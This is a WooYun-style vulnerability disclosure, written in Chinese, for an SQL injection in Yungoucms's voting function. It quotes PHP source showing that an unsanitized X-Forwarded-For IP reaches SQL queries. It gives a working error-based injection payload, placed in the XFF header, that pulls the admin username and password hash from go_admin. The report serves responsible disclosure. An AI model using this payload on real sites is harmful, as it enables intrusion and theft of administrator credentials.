2015-02-05: 细节已通知厂商并且等待厂商处理中 2015-02-05: 厂商已经确认,细节仅向厂商公开 2015-02-08: 细节向第三方安全合作伙伴开放 2015-04-01: 细节向核心白帽子及相关领域专家公开 2015-04-11: 细节向普通白帽子公开 2015-04-21: 细节向实习白帽子公开 2015-05-06: 细节向公众公开
rt
根据雨牛的 WooYun: Yungoucms Sql Injection 第一枚 我看了下相同位置的代码
public function checked_option(){ $mysql_model=System::load_sys_class('model'); $title="投票"; $curtime=time(); $option_id=abs(intval($_POST['radio'])); $vote_id= abs(intval($_POST['vote_id'])); $clientip=_get_ip(); $sqlallowguest=''; $sqlinterval=0; //查询投票项的规则和规定时间 $vote_subjects=$mysql_model->GetOne("select * from `@#_vote_subject` where `vote_id`='$vote_id'"); $sqlallowguest=$vote_subjects['vote_allowguest'];//1允许游客投票 0不允许游客投票 $sqlinterval=$vote_subjects['vote_interval']; //N天后可再次投票,0 表示此IP地址只能投一次 if(1==$sqlallowguest){//判断是否允许游客投票 $vote_activer=$mysql_model->GetOne("select * from `@#_vote_activer` where `vote_id`='$vote_id' and `ip`='$clientip' order by subtime desc"); if(!empty($vote_activer)){//判断该ip用户已经投过票 //上次投票间隔天数 $datenum=($curtime-$vote_activer['subtime'])/(60*60*24); if($sqlinterval==0 || $datenum<=$sqlinterval){ //0 表示此IP地址只能投一次 _message("您已参加此次投票活动",null,3); }else{ //查出新增加的票数 $vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' "); $option_number=$vote_option[0]['option_number']+1; $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' "); $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') "); _message("投票成功,感谢您的参与",null,3); } }else{ //查出新增加的票数 $vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' "); $option_number=$vote_option[0]['option_number']+1; $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' "); $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') "); _message("投票成功,感谢您的参与",null,3); } }else{ if($this->userid==''){ _message("您没有投票权限,请登录后投票!",null,3); exit(); } $vote_activer=$mysql_model->GetOne("select * from `@#_vote_activer` where `vote_id`='$vote_id' and `userid`='$this->userid'"); if(!empty($vote_activer)){//判断该用户已经投过票 //上次投票间隔天数 $datenum=($curtime-$vote_activer['subtime'])/(60*60*24); if($sqlinterval==0 || $datenum<=$sqlinterval){ //0 表示此IP地址只能投一次 _message("您已参加此次投票活动",null,3); }else{ //查出新增加的票数 $vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' "); $option_number=$vote_option[0]['option_number']+1; $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' "); $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') "); _message("投票成功,感谢您的参与",null,3); } }else{ //查出新增加的票数 $vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' "); $option_number=$vote_option[0]['option_number']+1; $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' "); $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') "); _message("投票成功,感谢您的参与",null,3); } }
$clientip=_get_ip()
再看看 _get_ip()函数/*获取客户端ip*/
function _get_ip(){ if (isset($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], "unknown")) $ip = $_SERVER['HTTP_CLIENT_IP']; else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], "unknown")) $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; else if (isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else if (isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = ""; return ($ip);}
把xff改为 1.1.1.1'or updatexml(1,concat(0x5e24,(select concat(username,0x23,userpass) from go_admin limit 0,1),0x5e24),1) or' 登录后打开 http://localhost/yungou/?/vote/vote/checked_option
转义
危害等级:中
漏洞Rank:10
确认时间:2015-02-05 18:49
是的
暂无